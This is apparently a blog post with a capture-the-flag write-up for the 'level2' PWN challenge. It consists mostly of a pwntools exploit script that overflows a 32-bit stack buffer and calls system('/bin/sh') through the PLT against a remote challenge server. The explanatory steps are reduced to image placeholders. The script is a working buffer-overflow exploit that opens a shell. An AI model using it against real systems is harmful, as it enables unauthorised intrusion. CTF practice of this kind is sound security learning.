当前位置：网站首页>PWN attack and defense world level2

PWN attack and defense world level2

2022-06-29 02:38:00 【Day-3】

Insert picture description here

First , Let's go through the standard process .
Insert picture description here
Run it .

Put in IDA in .

To write exp：

from pwn import *

context(os='Linux',arch="x86",log_level="debug")
content = 0 

elf = ELF("Level2")
system_plt_addr = elf.plt["system"]
bin_sh_addr = next(elf.search(b"/bin/sh"))

def main():
	if content == 1:
		day3 = process("Level2")
	else:
		day3 =remote("111.200.241.244",56811)
		
	payload = b'a' * (0x88 + 4) + p32(system_plt_addr)
	payload = payload + b'aaaa' + p32(bin_sh_addr)
	
	day3.sendlineafter("Input:\n",payload)
	
	day3.interactive()

main()